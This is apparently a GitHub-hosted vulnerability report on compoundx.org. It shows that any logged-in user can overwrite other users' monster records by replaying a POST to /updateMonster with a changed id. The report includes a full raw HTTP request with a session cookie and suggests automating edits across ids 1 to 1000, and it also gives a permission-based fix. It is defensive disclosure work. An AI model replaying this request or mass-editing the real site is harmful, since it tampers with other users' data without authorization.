You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository was archived by the owner on Jul 4, 2023. It is now read-only.
Fill in required fields, then capture the packet generated by clicking the "Submit to DB" button (shown below)
Change the monster id (91 in the example packet) to an arbitrary number, or a particular one if you happen to have a particular enemy in mind and know its id.
Make arbitrary changes to data fields, such as name, description, privacy, etc, then submit the packet.
Use automation software to submit packets cycling through monster ids from 1 to 1000 (or however high one prefers) to effect mass changes to all monsters.
Recommended fix:
Adding in permissions that disallow (non-admin) users from updating monsters that they did not make would prevent a bad actor with a single (non-admin) cookie from updating monsters owned by other users.
Impact:
Any user with a valid session cookie can rewrite the data fields of any monster in the database, regardless of ownership or privacy settings.
Steps to Reproduce:
POST /updateMonster/91 HTTP/1.1
Host: www.compoundx.org
Connection: close
Content-Length: 324
Cache-Control: max-age=0
Origin: https://www.compoundx.org
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://www.compoundx.org/monsterupdate/91
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESt2kQ.aPVNJtVkemmSxGB4I8usqrgEK90
strength=5&perception=5&fortitude=5&charisma=5&intelligence=5&dexterity=5&luck=5&name=hi+it%27s+me&level=1&role=Infantry&health=90&.nanites=90&shock=5&will=5&reflex=5&awareness=5&description="A+turtle+has+been+here...+and+here...+and+here..."&private=f
Recommended fix:
Adding in permissions that disallow (non-admin) users from updating monsters that they did not make would prevent a bad actor with a single (non-admin) cookie from updating monsters owned by other users.